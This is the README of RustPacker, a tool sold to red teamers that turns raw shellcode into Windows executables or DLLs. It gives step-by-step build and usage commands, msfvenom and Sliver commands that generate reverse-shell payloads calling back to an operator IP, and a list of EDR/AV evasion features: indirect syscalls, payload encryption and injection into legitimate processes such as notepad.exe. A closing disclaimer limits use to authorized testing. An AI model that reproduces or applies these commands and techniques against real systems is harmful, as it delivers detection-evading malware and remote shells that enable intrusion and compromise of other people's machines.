RustPacker is a template-based shellcode packer designed for penetration testers and red team operators. It converts raw shellcode into Windows executables or DLLs using various injection techniques and evasion methods.
- Multiple Injection Templates: Choose from various injection techniques (CRT, APC, Fibers, etc.)
- Encryption Support: XOR and AES encryption for payload obfuscation
- Syscall Evasion: Indirect syscalls to bypass EDR/AV detection
- Flexible Output: Generate both EXE and DLL files
- Cross-Platform: Works on any OS with Docker/Podman support
- Framework Compatible: Works with Metasploit, Sliver, and custom shellcode
# Clone the repository
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
# Build the container (recommended: use Podman for security)
podman build -t rustpacker -f Dockerfile
# Place your shellcode file in the shared folder
cp your_shellcode.raw shared/
# Pack your shellcode
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker \
-f shared/your_shellcode.raw \
-i ntcrt \
-e aes \
-b exe \
-t notepad.exe
# Find your packed binary in shared/output_[RANDOM_NAME]/target/x86_64-pc-windows-gnu/release/
# Linux/macOS
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'
# Now you can use it simply:
rustpacker -f shared/payload.raw -i syscrt -e aes -b exe -t explorer.exe
Metasploit (msfvenom):
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f raw -o payload.raw
Sliver:
# In Sliver console
generate --mtls 192.168.1.100:443 --format shellcode --os windows --evasion
Basic EXE with AES encryption:
rustpacker -f shared/payload.raw -i ntcrt -e aes -b exe -t notepad.exe
DLL with XOR encryption:
rustpacker -f shared/payload.raw -i ntapc -e xor -b dll
Custom output location:
rustpacker -f shared/payload.raw -i syscrt -e aes -b exe -o shared/custom_name.exe
Template | Description | Injection Method | Syscalls |
---|---|---|---|
wincrt |
High-level Windows API injection | Remote Process | β |
ntcrt |
Low-level NT API injection | Remote Process | β |
syscrt |
Indirect syscalls injection | Remote Process | β |
ntapc |
APC-based execution | New Process | β |
winfiber |
Fiber-based execution | Current Process | β |
ntfiber |
NT API + Fiber execution | Current Process | β |
sysfiber |
Indirect syscalls + Fiber execution | Current Process | β |
Process Injection Templates:
- Use with
-t <process_name>
to specify target process - Default target:
dllhost.exe
- Compatible with:
wincrt
,ntcrt
,syscrt
Self-Execution Templates:
- Execute shellcode within the packed binary
- Compatible with:
ntapc
,winfiber
,ntfiber
,sysfiber
# Ubuntu/Debian
sudo apt update && sudo apt upgrade -y
sudo apt install -y libssl-dev librust-openssl-dev musl-tools mingw-w64 cmake libxml2-dev
# Install Rust
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
rustup target add x86_64-pc-windows-gnu
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
cargo run -- -f shared/payload.raw -i ntcrt -e xor -b exe -t explorer.exe
RustPacker [OPTIONS]
OPTIONS:
-f, --file <FILE> Input shellcode file (raw format)
-i, --injection <TEMPLATE> Injection template [wincrt|ntcrt|syscrt|ntapc|winfiber|ntfiber|sysfiber]
-e, --encryption <TYPE> Encryption method [xor|aes]
-b, --binary <TYPE> Output binary type [exe|dll]
-t, --target <PROCESS> Target process name (for injection templates)
-o, --output <PATH> Custom output path and filename
-h, --help Print help information
-V, --version Print version information
RustPacker implements several evasion techniques:
- Indirect Syscalls: Bypass user-mode hooks (syscrt, sysfiber templates)
- Encryption: XOR and AES payload encryption
- Process Injection: Hide execution in legitimate processes
- Template Variety: Multiple execution methods to avoid signatures
- Rust Compilation: Native binaries with reduced detection surface
We recommend using Podman instead of Docker for security reasons:
- Rootless containers by default
- No daemon running as root
- Better security isolation
Contributions are welcome! Here's how you can help:
- Code Review: Review the codebase for improvements
- Issues: Report bugs or request features
- Templates: Contribute new injection techniques
- Documentation: Improve documentation and examples
- Multiple injection templates
- XOR and AES encryption
- Indirect syscalls support
- EXE and DLL output formats
- Docker containerization
- String encryption (litcrypt)
- Sandbox evasion techniques
- Binary signing support
- Mutex/Semaphore support
- memN0ps - Inspiration and guidance
- rust-syscalls - Syscall implementation
- trickster0 - OffensiveRust repository
- Maldev Academy - Fiber execution techniques
- craiyon - Logo generation
This tool is provided for educational and authorized penetration testing purposes only.
- Usage against targets without prior mutual consent is illegal
- Users are responsible for complying with all applicable laws
- Developers assume no liability for misuse or damages
- Only use in authorized environments with proper permission
Use responsibly and ethically.
Made with β€οΈ for the cybersecurity community
Report Issues β’ Contribute β’ Documentation